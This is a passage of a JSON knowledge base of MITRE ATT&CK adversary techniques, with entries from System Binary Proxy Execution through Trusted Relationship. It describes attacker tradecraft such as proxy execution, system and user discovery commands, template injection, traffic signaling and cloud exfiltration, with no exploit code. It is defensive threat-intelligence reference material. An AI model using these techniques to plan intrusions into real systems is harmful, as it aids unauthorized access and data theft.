"description": "Adversaries may bypass process and/or signature-based defenses by proxying execution of malicious content with signed, or otherwise trusted, binaries. Binaries used in this technique are often Microsoft-signed files, indicating that they have been either downloaded from Microsoft or are already native in the operating system.<sup>[[LOLBAS Project](https://app.tidalcyber.com/references/14b1d3ab-8508-4946-9913-17e667956064)]</sup> Binaries signed with trusted digital certificates can typically execute on Windows systems protected by digital signature validation. Several Microsoft signed binaries that are default on Windows installations can be used to proxy execution of other files or commands.\n\nSimilarly, on Linux systems adversaries may abuse trusted binaries such as <code>split</code> to proxy execution of malicious commands.<sup>[[split man page](https://app.tidalcyber.com/references/3a4dc770-8bfa-44e9-bb0e-f0af0ae92994)]</sup><sup>[[GTFO split](https://app.tidalcyber.com/references/4b86c8c3-57b0-4558-be21-f928acb23f49)]</sup>",
            "meta": {
                "platforms": [
                    "Linux",
                    "macOS",
                    "Windows"
                ],
                "source": "MITRE"
            },
            "related": [
                {
                    "dest-uuid": "8e29c6c9-0c10-4bb0-827d-ff0ab8922726",
                    "type": "uses"
                }
            ],
            "uuid": "4060ad55-7ff1-4127-acad-808b2bc77655",
            "value": "System Binary Proxy Execution"
        },
        {
"description": "An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from [System Information Discovery](https://app.tidalcyber.com/technique/a2961a00-450e-45a5-b293-f699d9f3b4ea) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.\n\nTools such as [Systeminfo](https://app.tidalcyber.com/software/cecea681-a753-47b5-9d77-c10a5b4403ab) can be used to gather detailed system information. If running with privileged access, a breakdown of system data can be gathered through the <code>systemsetup</code> configuration tool on macOS. As an example, adversaries with user-level access can execute the <code>df -aH</code> command to obtain currently mounted disks and associated freely available space. Adversaries may also leverage a [Network Device CLI](https://app.tidalcyber.com/technique/284bfbb3-99f0-4c3d-bc1f-ab74065b7907) on network devices to gather detailed system information (e.g. <code>show version</code>).<sup>[[US-CERT-TA18-106A](https://app.tidalcyber.com/references/1fe55557-94af-4697-a675-884701f70f2a)]</sup> [System Information Discovery](https://app.tidalcyber.com/technique/a2961a00-450e-45a5-b293-f699d9f3b4ea) combined with information gathered from other forms of discovery and reconnaissance can drive payload development and concealment.<sup>[[OSX.FairyTale](https://app.tidalcyber.com/references/27f8ad45-53d2-48ba-b549-f7674cf9c2e7)]</sup><sup>[[20 macOS Common Tools and Techniques](https://app.tidalcyber.com/references/3ee99ff4-daf4-4776-9d94-f7cf193c2b0c)]</sup>\n\nInfrastructure as a Service (IaaS) cloud providers such as AWS, GCP, and Azure allow access to instance and virtual machine information via APIs. Successful authenticated API calls can return data such as the operating system platform and status of a particular instance or the model view of a virtual machine.<sup>[[Amazon Describe Instance](https://app.tidalcyber.com/references/c0b6a8a4-0d94-414d-b5ab-cf5485240dee)]</sup><sup>[[Google Instances Resource](https://app.tidalcyber.com/references/9733447c-072f-4da8-9cc7-0a0ce6a3b820)]</sup><sup>[[Microsoft Virutal Machine API](https://app.tidalcyber.com/references/f565c237-07c5-4e9e-9879-513627517109)]</sup>",
"meta": {
"platforms": [
"IaaS",
"Linux",
"macOS",
"Network",
"Windows"
],
"source": "MITRE"
},
"related": [
{
"dest-uuid": "ee7e5a85-a940-46e4-b408-12956f3baafa",
"type": "uses"
}
],
"uuid": "a2961a00-450e-45a5-b293-f699d9f3b4ea",
"value": "System Information Discovery"
},
{
"description": "\nAdversaries may gather information in an attempt to calculate the geographical location of a victim host. Adversaries may use the information from [System Location Discovery](https://app.tidalcyber.com/technique/90e6a093-3e87-4d74-8b68-38c7d7e5e93c) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.\n\nAdversaries may attempt to infer the location of a system using various system checks, such as time zone, keyboard layout, and/or language settings.<sup>[[FBI Ragnar Locker 2020](https://app.tidalcyber.com/references/38b9b8a3-6fd3-4650-9192-14ee3f302705)]</sup><sup>[[Sophos Geolocation 2016](https://app.tidalcyber.com/references/a3b7540d-20cc-4d94-8321-9fd730486f8c)]</sup><sup>[[Bleepingcomputer RAT malware 2020](https://app.tidalcyber.com/references/a587ea99-a951-4aa8-a3cf-a4822ae97490)]</sup> Windows API functions such as <code>GetLocaleInfoW</code> can also be used to determine the locale of the host.<sup>[[FBI Ragnar Locker 2020](https://app.tidalcyber.com/references/38b9b8a3-6fd3-4650-9192-14ee3f302705)]</sup> In cloud environments, an instance's availability zone may also be discovered by accessing the instance metadata service from the instance.<sup>[[AWS Instance Identity Documents](https://app.tidalcyber.com/references/efff0080-59fc-4ba7-ac91-771358f68405)]</sup><sup>[[Microsoft Azure Instance Metadata 2021](https://app.tidalcyber.com/references/66e93b75-0067-4cdb-b695-8f8109ef26e0)]</sup>\n\nAdversaries may also attempt to infer the location of a victim host using IP addressing, such as via online geolocation IP-lookup services.<sup>[[Securelist Trasparent Tribe 2020](https://app.tidalcyber.com/references/0db470b1-ab22-4b67-a858-472e4de7c6f0)]</sup><sup>[[Sophos Geolocation 2016](https://app.tidalcyber.com/references/a3b7540d-20cc-4d94-8321-9fd730486f8c)]</sup>",
"meta": {
"platforms": [
"IaaS",
"Linux",
"macOS",
"Windows"
],
"source": "MITRE"
},
"related": [
{
"dest-uuid": "ee7e5a85-a940-46e4-b408-12956f3baafa",
"type": "uses"
}
],
"uuid": "90e6a093-3e87-4d74-8b68-38c7d7e5e93c",
"value": "System Location Discovery"
},
{
"description": "Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include [Arp](https://app.tidalcyber.com/software/45b51950-6190-4572-b1a2-7c69d865251e), [ipconfig](https://app.tidalcyber.com/software/4f519002-0576-4f8e-8add-73ebac9a86e6)/[ifconfig](https://app.tidalcyber.com/software/93ab16d1-625e-4b1c-bb28-28974c269c47), [nbtstat](https://app.tidalcyber.com/software/81c2fc9b-8c2c-40f6-a327-dcdd64b70a7e), and [route](https://app.tidalcyber.com/software/3b755518-9085-474e-8bc4-4f9344d9c8af).\n\nAdversaries may also leverage a [Network Device CLI](https://app.tidalcyber.com/technique/284bfbb3-99f0-4c3d-bc1f-ab74065b7907) on network devices to gather information about configurations and settings, such as IP addresses of configured interfaces and static/dynamic routes (e.g. <code>show ip route</code>, <code>show ip interface</code>).<sup>[[US-CERT-TA18-106A](https://app.tidalcyber.com/references/1fe55557-94af-4697-a675-884701f70f2a)]</sup><sup>[[Mandiant APT41 Global Intrusion ](https://app.tidalcyber.com/references/9b75a38e-e5c7-43c8-a7fb-c7f212e00497)]</sup>\n\nAdversaries may use the information from [System Network Configuration Discovery](https://app.tidalcyber.com/technique/adb6b8c1-2bdb-42b9-95da-5ce07e8796f7) during automated discovery to shape follow-on behaviors, including determining certain access within the target network and what actions to do next. ",
"meta": {
"platforms": [
"Linux",
"macOS",
"Network",
"Windows"
],
"source": "MITRE"
},
"related": [
{
"dest-uuid": "ee7e5a85-a940-46e4-b408-12956f3baafa",
"type": "uses"
}
],
"uuid": "adb6b8c1-2bdb-42b9-95da-5ce07e8796f7",
"value": "System Network Configuration Discovery"
},
{
"description": "Adversaries may attempt to get a listing of network connections to or from the compromised system they are currently accessing or from remote systems by querying for information over the network. \n\nAn adversary who gains access to a system that is part of a cloud-based environment may map out Virtual Private Clouds or Virtual Networks in order to determine what systems and services are connected. The actions performed are likely the same types of discovery techniques depending on the operating system, but the resulting information may include details about the networked cloud environment relevant to the adversary's goals. Cloud providers may have different ways in which their virtual networks operate.<sup>[[Amazon AWS VPC Guide](https://app.tidalcyber.com/references/7972332d-fbe9-4f14-9511-4298f65f2a86)]</sup><sup>[[Microsoft Azure Virtual Network Overview](https://app.tidalcyber.com/references/bf7f2e7a-f5ae-4b6e-8c90-fd41a92c4615)]</sup><sup>[[Google VPC Overview](https://app.tidalcyber.com/references/9ebe53cf-657f-475d-85e4-9e30f4af1e7d)]</sup> Similarly, adversaries who gain access to network devices may also perform similar discovery activities to gather information about connected systems and services.\n\nUtilities and commands that acquire this information include [netstat](https://app.tidalcyber.com/software/132fb908-9f13-4bcf-aa64-74cbc72f5491), \"net use,\" and \"net session\" with [Net](https://app.tidalcyber.com/software/c9b8522f-126d-40ff-b44e-1f46098bd8cc). In Mac and Linux, [netstat](https://app.tidalcyber.com/software/132fb908-9f13-4bcf-aa64-74cbc72f5491) and <code>lsof</code> can be used to list current connections. <code>who -a</code> and <code>w</code> can be used to show which users are currently logged in, similar to \"net session\". Additionally, built-in features native to network devices and [Network Device CLI](https://app.tidalcyber.com/technique/284bfbb3-99f0-4c3d-bc1f-ab74065b7907) may be used (e.g. <code>show ip sockets</code>, <code>show tcp brief</code>).<sup>[[US-CERT-TA18-106A](https://app.tidalcyber.com/references/1fe55557-94af-4697-a675-884701f70f2a)]</sup>",
"meta": {
"platforms": [
"IaaS",
"Linux",
"macOS",
"Network",
"Windows"
],
"source": "MITRE"
},
"related": [
{
"dest-uuid": "ee7e5a85-a940-46e4-b408-12956f3baafa",
"type": "uses"
}
],
"uuid": "0d258912-58b1-4982-b90f-eed576f05ffc",
"value": "System Network Connections Discovery"
},
{
"description": "Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using [OS Credential Dumping](https://app.tidalcyber.com/technique/368f85f9-2b15-4732-80fe-087694eaf34d). The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://app.tidalcyber.com/technique/86e6f1f0-290b-4971-b50e-80e98a0a768b) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.\n\nVarious utilities and commands may acquire this information, including <code>whoami</code>. In macOS and Linux, the currently logged in user can be identified with <code>w</code> and <code>who</code>. On macOS the <code>dscl . list /Users | grep -v '_'</code> command can also be used to enumerate user accounts. Environment variables, such as <code>%USERNAME%</code> and <code>$USER</code>, may also be used to access this information.\n\nOn network devices, [Network Device CLI](https://app.tidalcyber.com/technique/284bfbb3-99f0-4c3d-bc1f-ab74065b7907) commands such as `show users` and `show ssh` can be used to display users currently logged into the device.<sup>[[show_ssh_users_cmd_cisco](https://app.tidalcyber.com/references/11d34884-4559-57ad-8910-54e517c6493e)]</sup><sup>[[US-CERT TA18-106A Network Infrastructure Devices 2018](https://app.tidalcyber.com/references/8fdf280d-680f-4b8f-8fb9-6b3118ec3983)]</sup>",
"meta": {
"platforms": [
"Linux",
"macOS",
"Network",
"Windows"
],
"source": "MITRE"
},
"related": [
{
"dest-uuid": "ee7e5a85-a940-46e4-b408-12956f3baafa",
"type": "uses"
}
],
"uuid": "86e6f1f0-290b-4971-b50e-80e98a0a768b",
"value": "System Owner/User Discovery"
},
{
"description": "Adversaries may use trusted scripts, often signed with certificates, to proxy the execution of malicious files. Several Microsoft signed scripts that have been downloaded from Microsoft or are default on Windows installations can be used to proxy execution of other files.<sup>[[LOLBAS Project](https://app.tidalcyber.com/references/14b1d3ab-8508-4946-9913-17e667956064)]</sup> This behavior may be abused by adversaries to execute malicious files that could bypass application control and signature validation on systems.<sup>[[GitHub Ultimate AppLocker Bypass List](https://app.tidalcyber.com/references/a2fa7fb8-ddba-44cf-878f-448fb2aa6149)]</sup>",
"meta": {
"platforms": [
"Windows"
],
"source": "MITRE"
},
"related": [
{
"dest-uuid": "8e29c6c9-0c10-4bb0-827d-ff0ab8922726",
"type": "uses"
}
],
"uuid": "e0d1825e-e46a-48f2-9b28-8346a39d39b0",
"value": "System Script Proxy Execution"
},
{
"description": "Adversaries may try to gather information about registered local system services. Adversaries may obtain information about services using tools as well as OS utility commands such as <code>sc query</code>, <code>tasklist /svc</code>, <code>systemctl --type=service</code>, and <code>net start</code>.\n\nAdversaries may use the information from [System Service Discovery](https://app.tidalcyber.com/technique/e0a347e2-2ac5-458b-ab0f-18d81b6d6055) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.",
"meta": {
"platforms": [
"Linux",
"macOS",
"Windows"
],
"source": "MITRE"
},
"related": [
{
"dest-uuid": "ee7e5a85-a940-46e4-b408-12956f3baafa",
"type": "uses"
}
],
"uuid": "e0a347e2-2ac5-458b-ab0f-18d81b6d6055",
"value": "System Service Discovery"
},
{
"description": "Adversaries may abuse system services or daemons to execute commands or programs. Adversaries can execute malicious content by interacting with or creating services either locally or remotely. Many services are set to run at boot, which can aid in achieving persistence ([Create or Modify System Process](https://app.tidalcyber.com/technique/f8aa018b-5134-4201-87f2-e55d20f40b17)), but adversaries can also abuse services for one-time or temporary execution.",
"meta": {
"platforms": [
"Linux",
"macOS",
"Windows"
],
"source": "MITRE"
},
"related": [
{
"dest-uuid": "dad2337d-6d35-410a-acc5-da36ff83ee44",
"type": "uses"
}
],
"uuid": "a2300ed3-a502-4fe4-bad5-4aa1efc72941",
"value": "System Services"
},
{
"description": "Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems. Operating systems may contain commands to initiate a shutdown/reboot of a machine or network device. In some cases, these commands may also be used to initiate a shutdown/reboot of a remote computer or network device via [Network Device CLI](https://app.tidalcyber.com/technique/284bfbb3-99f0-4c3d-bc1f-ab74065b7907) (e.g. <code>reload</code>).<sup>[[Microsoft Shutdown Oct 2017](https://app.tidalcyber.com/references/c587f021-596a-4e63-ac51-afa2793a859d)]</sup><sup>[[alert_TA18_106A](https://app.tidalcyber.com/references/26b520dc-5c68-40f4-82fb-366d27fc0c2f)]</sup>\n\nShutting down or rebooting systems may disrupt access to computer resources for legitimate users while also impeding incident response/recovery.\n\nAdversaries may attempt to shutdown/reboot a system after impacting it in other ways, such as [Disk Structure Wipe](https://app.tidalcyber.com/technique/14a944d3-ab95-40d8-b069-ccc4824ef46d) or [Inhibit System Recovery](https://app.tidalcyber.com/technique/d207c03b-fbe7-420e-a053-339f4650c043), to hasten the intended effects on system availability.<sup>[[Talos Nyetya June 2017](https://app.tidalcyber.com/references/c76e806c-b0e3-4ab9-ba6d-68a9f731f127)]</sup><sup>[[Talos Olympic Destroyer 2018](https://app.tidalcyber.com/references/25a2e179-7abd-4091-8af4-e9d2bf24ef11)]</sup>",
"meta": {
"platforms": [
"Linux",
"macOS",
"Network",
"Windows"
],
"source": "MITRE"
},
"related": [
{
"dest-uuid": "52c0edbc-ce4d-429a-b1d5-720403e0172f",
"type": "uses"
}
],
"uuid": "24787dca-6afd-4ab3-ab6c-32e9486ec418",
"value": "System Shutdown/Reboot"
},
{
"description": "An adversary may gather the system time and/or time zone settings from a local or remote system. The system time is set and stored by services, such as the Windows Time Service on Windows or <code>systemsetup</code> on macOS.<sup>[[MSDN System Time](https://app.tidalcyber.com/references/5e15e03b-be8b-4f3d-a3ae-0df7a4ecfbec)]</sup><sup>[[Technet Windows Time Service](https://app.tidalcyber.com/references/0d908e07-abc1-40fc-b147-9b9fd483b262)]</sup><sup>[[systemsetup mac time](https://app.tidalcyber.com/references/a85bd111-a2ca-5e66-b90e-f52ff780fc5c)]</sup> These time settings may also be synchronized between systems and services in an enterprise network, typically accomplished with a network time server within a domain.<sup>[[Mac Time Sync](https://app.tidalcyber.com/references/b36dd8af-045d-57b0-b0a9-45d831fe6373)]</sup><sup>[[linux system time](https://app.tidalcyber.com/references/2dfd22d7-c78b-5967-b732-736f37ea5489)]</sup>\n\nSystem time information may be gathered in a number of ways, such as with [Net](https://app.tidalcyber.com/software/c9b8522f-126d-40ff-b44e-1f46098bd8cc) on Windows by performing <code>net time \\\\hostname</code> to gather the system time on a remote system. The victim's time zone may also be inferred from the current system time or gathered by using <code>w32tm /tz</code>.<sup>[[Technet Windows Time Service](https://app.tidalcyber.com/references/0d908e07-abc1-40fc-b147-9b9fd483b262)]</sup> In addition, adversaries can discover device uptime through functions such as <code>GetTickCount()</code> to determine how long it has been since the system booted up.<sup>[[Virtualization/Sandbox Evasion](https://app.tidalcyber.com/references/a3031616-f21a-574f-a9a5-a808a6230aa8)]</sup>\n\nOn network devices, [Network Device CLI](https://app.tidalcyber.com/technique/284bfbb3-99f0-4c3d-bc1f-ab74065b7907) commands such as `show clock detail` can be used to see the current time configuration.<sup>[[show_clock_detail_cisco_cmd](https://app.tidalcyber.com/references/a2215813-31b0-5624-92d8-479e7bd1a30b)]</sup>\n\nIn addition, system calls – such as <code>time()</code> – have been used to collect the current time on Linux devices.<sup>[[MAGNET GOBLIN](https://app.tidalcyber.com/references/955b6449-4cd5-5512-a5f3-2bcb91def3ef)]</sup> On macOS systems, adversaries may use commands such as <code>systemsetup -gettimezone</code> or <code>timeIntervalSinceNow</code> to gather current time zone information or current date and time.<sup>[[System Information Discovery Technique](https://app.tidalcyber.com/references/6123fbd4-c6fc-504c-92f2-5d405730c298)]</sup><sup>[[ESET DazzleSpy Jan 2022](https://app.tidalcyber.com/references/212012ac-9084-490f-8dd2-5cc9ac6e6de1)]</sup>\n\nThis information could be useful for performing other techniques, such as executing a file with a [Scheduled Task/Job](https://app.tidalcyber.com/technique/0baf02af-ffaa-403f-9f0d-da51f463a1d8)<sup>[[RSA EU12 They're Inside](https://app.tidalcyber.com/references/8330ab88-9c73-4332-97d6-c1fb95b1a155)]</sup>, or to discover locality information based on time zone to assist in victim targeting (i.e. [System Location Discovery](https://app.tidalcyber.com/technique/90e6a093-3e87-4d74-8b68-38c7d7e5e93c)). Adversaries may also use knowledge of system time as part of a time bomb, or delaying execution until a specified date/time.<sup>[[AnyRun TimeBomb](https://app.tidalcyber.com/references/cd369bf9-80a8-426f-a0aa-c9745b40696c)]</sup>",
"meta": {
"platforms": [
"Linux",
"macOS",
"Network",
"Windows"
],
"source": "MITRE"
},
"related": [
{
"dest-uuid": "ee7e5a85-a940-46e4-b408-12956f3baafa",
"type": "uses"
}
],
"uuid": "2e634ff1-a4ea-41b4-8ee9-23db4627a986",
"value": "System Time Discovery"
},
{
"description": "\nAdversaries may deliver payloads to remote systems by adding content to shared storage locations, such as network drives or internal code repositories. Content stored on network drives or in other shared locations may be tainted by adding malicious programs, scripts, or exploit code to otherwise valid files. Once a user opens the shared tainted content, the malicious portion can be executed to run the adversary's code on a remote system. Adversaries may use tainted shared content to move laterally.\n\nA directory share pivot is a variation on this technique that uses several other techniques to propagate malware when users access a shared network directory. It uses [Shortcut Modification](https://app.tidalcyber.com/technique/bfde0a09-8109-41e4-b8c9-68fe20e8131b) of directory .LNK files that use [Masquerading](https://app.tidalcyber.com/technique/a0adacc1-8d2a-4e0b-92c1-3766264df4fd) to look like the real directories, which are hidden through [Hidden Files and Directories](https://app.tidalcyber.com/technique/14e81a2d-9eca-429c-9fb9-08e109de9f6c). The malicious .LNK-based directories have an embedded command that executes the hidden malware file in the directory and then opens the real intended directory so that the user's expected action still occurs. When used with frequently used network directories, the technique may result in frequent reinfections and broad access to systems and potentially to new and higher privileged accounts. <sup>[[Retwin Directory Share Pivot](https://app.tidalcyber.com/references/027c5274-6b61-447a-9058-edb844f112dd)]</sup>\n\nAdversaries may also compromise shared network directories through binary infections by appending or prepending its code to the healthy binary on the shared network directory. The malware may modify the original entry point (OEP) of the healthy binary to ensure that it is executed before the legitimate code. The infection could continue to spread via the newly infected file when it is executed by a remote system. These infections may target both binary and non-binary formats that end with extensions including, but not limited to, .EXE, .DLL, .SCR, .BAT, and/or .VBS.",
"meta": {
"platforms": [
"Linux",
"macOS",
"Office 365",
"SaaS",
"Windows"
],
"source": "MITRE"
},
"related": [
{
"dest-uuid": "50ba4930-7c8e-4ef9-bc36-70e7dae661eb",
"type": "uses"
}
],
"uuid": "58987d0d-2ebf-4783-90ac-5164fe9b9e43",
"value": "Taint Shared Content"
},
{
"description": "Adversaries may create or modify references in user document templates to conceal malicious code or force authentication attempts. For example, Microsoft’s Office Open XML (OOXML) specification defines an XML-based format for Office documents (.docx, xlsx, .pptx) to replace older binary formats (.doc, .xls, .ppt). OOXML files are packed together ZIP archives comprised of various XML files, referred to as parts, containing properties that collectively define how a document is rendered.<sup>[[Microsoft Open XML July 2017](https://app.tidalcyber.com/references/8145f894-6477-4629-81de-1dd26070ee0a)]</sup>\n\nProperties within parts may reference shared public resources accessed via online URLs. For example, template properties may reference a file, serving as a pre-formatted document blueprint, that is fetched when the document is loaded.\n\nAdversaries may abuse these templates to initially conceal malicious code to be executed via user documents. Template references injected into a document may enable malicious payloads to be fetched and executed when the document is loaded.<sup>[[SANS Brian Wiltse Template Injection](https://app.tidalcyber.com/references/8c010c87-865b-4168-87a7-4a24db413def)]</sup> These documents can be delivered via other techniques such as [Phishing](https://app.tidalcyber.com/technique/d4a36624-50cb-43d3-95af-a2e10878a533) and/or [Taint Shared Content](https://app.tidalcyber.com/technique/58987d0d-2ebf-4783-90ac-5164fe9b9e43) and may evade static detections since no typical indicators (VBA macro, script, etc.) are present until after the malicious payload is fetched.<sup>[[Redxorblue Remote Template Injection](https://app.tidalcyber.com/references/bce1cd78-b55e-40cf-8a90-64240db867ac)]</sup> Examples have been seen in the wild where template injection was used to load malicious code containing an exploit.<sup>[[MalwareBytes Template Injection OCT 2017](https://app.tidalcyber.com/references/7ef0ab1f-c7d6-46fe-b489-fab4db623e0a)]</sup>\n\nAdversaries may also modify the <code>*\\template</code> control word within an .rtf file to similarly conceal then download malicious code. This legitimate control word value is intended to be a file destination of a template file resource that is retrieved and loaded when an .rtf file is opened. However, adversaries may alter the bytes of an existing .rtf file to insert a template control word field to include a URL resource of a malicious payload.<sup>[[Proofpoint RTF Injection](https://app.tidalcyber.com/references/8deb6edb-293f-4b9d-882a-541675864eb5)]</sup><sup>[[Ciberseguridad Decoding malicious RTF files](https://app.tidalcyber.com/references/82d2451b-300f-4891-b1e7-ade53dff1126)]</sup>\n\nThis technique may also enable [Forced Authentication](https://app.tidalcyber.com/technique/e732e1d4-fffa-4fc3-b387-47782c821688) by injecting a SMB/HTTPS (or other credential prompting) URL and triggering an authentication attempt.<sup>[[Anomali Template Injection MAR 2018](https://app.tidalcyber.com/references/3cdeb2a2-9582-4725-a132-6503dbe04e1d)]</sup><sup>[[Talos Template Injection July 2017](https://app.tidalcyber.com/references/175ea537-2a94-42c7-a83b-bec8906ee6b9)]</sup><sup>[[ryhanson phishery SEPT 2016](https://app.tidalcyber.com/references/7e643cf0-5df7-455d-add7-2342f36bdbcb)]</sup>",
"meta": {
"platforms": [
"Windows"
],
"source": "MITRE"
},
"related": [
{
"dest-uuid": "8e29c6c9-0c10-4bb0-827d-ff0ab8922726",
"type": "uses"
}
],
"uuid": "02b8e7c1-0db7-43f5-a5bc-531b30395122",
"value": "Template Injection"
},
{
"description": "Adversaries may use traffic signaling to hide open ports or other malicious functionality used for persistence or command and control. Traffic signaling involves the use of a magic value or sequence that must be sent to a system to trigger a special response, such as opening a closed port or executing a malicious task. This may take the form of sending a series of packets with certain characteristics before a port will be opened that the adversary can use for command and control. Usually this series of packets consists of attempted connections to a predefined sequence of closed ports (i.e. [Port Knocking](https://app.tidalcyber.com/technique/34a112db-c61d-4ea2-872f-de3fc1af87a3)), but can involve unusual flags, specific strings, or other unique characteristics. After the sequence is completed, opening a port may be accomplished by the host-based firewall, but could also be implemented by custom software.\n\nAdversaries may also communicate with an already open port, but the service listening on that port will only respond to commands or trigger other malicious functionality if passed the appropriate magic value(s).\n\nThe observation of the signal packets to trigger the communication can be conducted through different methods. One means, originally implemented by Cd00r <sup>[[Hartrell cd00r 2002](https://app.tidalcyber.com/references/739e6517-10f5-484d-8000-8818d63e7341)]</sup>, is to use the libpcap libraries to sniff for the packets in question. Another method leverages raw sockets, which enables the malware to use ports that are already open for use by other programs.\n\nOn network devices, adversaries may use crafted packets to enable [Network Device Authentication](https://app.tidalcyber.com/technique/195aa08b-15fd-4019-b905-8f31bc5e2094) for standard services offered by the device such as telnet. Such signaling may also be used to open a closed service port such as telnet, or to trigger module modification of malware implants on the device, adding, removing, or changing malicious capabilities. Adversaries may use crafted packets to attempt to connect to one or more (open or closed) ports, but may also attempt to connect to a router interface, broadcast, and network address IP on the same port in order to achieve their goals and objectives.<sup>[[Cisco Synful Knock Evolution](https://app.tidalcyber.com/references/29301297-8343-4f75-8096-7fe229812f75)]</sup><sup>[[Mandiant - Synful Knock](https://app.tidalcyber.com/references/1f6eaa98-9184-4341-8634-5512a9c632dd)]</sup><sup>[[Cisco Blog Legacy Device Attacks](https://app.tidalcyber.com/references/f7ce5099-7e04-4c0b-8767-e0eec664b18e)]</sup> To enable this traffic signaling on embedded devices, adversaries must first achieve and leverage [Patch System Image](https://app.tidalcyber.com/technique/630a17c1-0176-4764-8f5c-a83f4f3e980f) due to the monolithic nature of the architecture.\n\nAdversaries may also use the Wake-on-LAN feature to turn on powered off systems. Wake-on-LAN is a hardware feature that allows a powered down system to be powered on, or woken up, by sending a magic packet to it. Once the system is powered on, it may become a target for lateral movement.<sup>[[Bleeping Computer - Ryuk WoL](https://app.tidalcyber.com/references/f6670b73-4d57-4aad-8264-1d42d585e280)]</sup><sup>[[AMD Magic Packet](https://app.tidalcyber.com/references/06d36dea-e13d-48c4-b6d6-0c175c379f5b)]</sup>",
"meta": {
"platforms": [
"Linux",
"macOS",
"Network",
"Windows"
],
"source": "MITRE"
},
"related": [
{
"dest-uuid": "ec4f9786-c00c-430a-bc6d-0d0d22fdd393",
"type": "uses"
},
{
"dest-uuid": "8e29c6c9-0c10-4bb0-827d-ff0ab8922726",
"type": "uses"
},
{
"dest-uuid": "94ffe549-1c29-438d-9c7f-e27f7acee0bb",
"type": "uses"
}
],
"uuid": "c2cf211a-9676-4922-a386-69697ab4934a",
"value": "Traffic Signaling"
},
{
"description": "Adversaries may exfiltrate data by transferring the data, including through sharing/syncing and creating backups of cloud environments, to another cloud account they control on the same service.\n\nA defender who is monitoring for large transfers to outside the cloud environment through normal file transfers or over command and control channels may not be watching for data transfers to another account within the same cloud provider. Such transfers may utilize existing cloud provider APIs and the internal address space of the cloud provider to blend into normal traffic or avoid data transfers over external network interfaces.<sup>[[TLDRSec AWS Attacks](https://app.tidalcyber.com/references/b8de9dd2-3c57-5417-a24f-0260dff6afc6)]</sup>\n\nAdversaries may also use cloud-native mechanisms to share victim data with adversary-controlled cloud accounts, such as creating anonymous file sharing links or, in Azure, a shared access signature (SAS) URI.<sup>[[Microsoft Azure Storage Shared Access Signature](https://app.tidalcyber.com/references/9031357f-04ac-5c07-a59d-97b9e32edf79)]</sup>\n\nIncidents have been observed where adversaries have created backups of cloud instances and transferred them to separate accounts.<sup>[[DOJ GRU Indictment Jul 2018](https://app.tidalcyber.com/references/d65f371b-19d0-49de-b92b-94a2bea1d988)]</sup> ",
"meta": {
"platforms": [
"Google Workspace",
"IaaS",
"Office 365",
"SaaS"
],
"source": "MITRE"
},
"related": [
{
"dest-uuid": "66249a6d-be4e-43ab-a295-349d03a98023",
"type": "uses"
}
],
"uuid": "ab4f22d6-465f-4a16-8a40-693f2234c4ac",
"value": "Transfer Data to Cloud Account"
},
{
"description": "Adversaries may take advantage of trusted developer utilities to proxy execution of malicious payloads. There are many utilities used for software development related tasks that can be used to execute code in various forms to assist in development, debugging, and reverse engineering.<sup>[[engima0x3 DNX Bypass](https://app.tidalcyber.com/references/e0186f1d-100d-4e52-b6f7-0a7e1c1a35f0)]</sup><sup>[[engima0x3 RCSI Bypass](https://app.tidalcyber.com/references/0b815bd9-6c7f-4bd8-9031-667fa6252f89)]</sup><sup>[[Exploit Monday WinDbg](https://app.tidalcyber.com/references/abd5f871-e12e-4355-af72-d4be79cb0291)]</sup><sup>[[LOLBAS Tracker](https://app.tidalcyber.com/references/f0e368f1-3347-41ef-91fb-995c3cb07707)]</sup> These utilities may often be signed with legitimate certificates that allow them to execute on a system and proxy execution of malicious code through a trusted process that effectively bypasses application control solutions.",
"meta": {
"platforms": [
"Windows"
],
"source": "MITRE"
},
"related": [
{
"dest-uuid": "8e29c6c9-0c10-4bb0-827d-ff0ab8922726",
"type": "uses"
}
],
"uuid": "8811114c-a0cf-479c-b95d-c036467749e3",
"value": "Trusted Developer Utilities Proxy Execution"
},
{
"description": "Adversaries may breach or otherwise leverage organizations who have access to intended victims. Access through a trusted third-party relationship abuses an existing connection that may not be protected or that receives less scrutiny than standard mechanisms of gaining access to a network.\n\nOrganizations often grant elevated access to second- or third-party external providers in order to allow them to manage internal systems as well as cloud-based environments. Some examples of these relationships include IT services contractors, managed security providers, and infrastructure contractors (e.g. HVAC, elevators, physical security). The third-party provider's access may be intended to be limited to the infrastructure being maintained, but may exist on the same network as the rest of the enterprise. As such, [Valid Accounts](https://app.tidalcyber.com/technique/a9b7eb2f-63e7-41bc-9d77-f7c4cede5406) used by the other party for access to internal network systems may be compromised and used.<sup>[[CISA IT Service Providers](https://app.tidalcyber.com/references/b8bee7f9-155e-4765-9492-01182e4435b7)]</sup>\n\nIn Office 365 environments, organizations may grant Microsoft partners or resellers delegated administrator permissions. By compromising a partner or reseller account, an adversary may be able to leverage existing delegated administrator relationships or send new delegated administrator offers to clients in order to gain administrative control over the victim tenant.<sup>[[Office 365 Delegated Administration](https://app.tidalcyber.com/references/fa0ed0fd-bf57-4a0f-9370-e22f27b20e42)]</sup>",
"meta": {
"platforms": [
"IaaS",
"Linux",
"macOS",
"Office 365",
"SaaS",
"Windows"
],
"source": "MITRE"
},
"related": [
{
"dest-uuid": "586a5b49-c566-4a57-beb4-e7c667f9c34c",
"type": "uses"
}
],
"uuid": "7549c2f9-b5d2-4773-90ed-42f668aecacf",
"value": "Trusted Relationship"
},
{
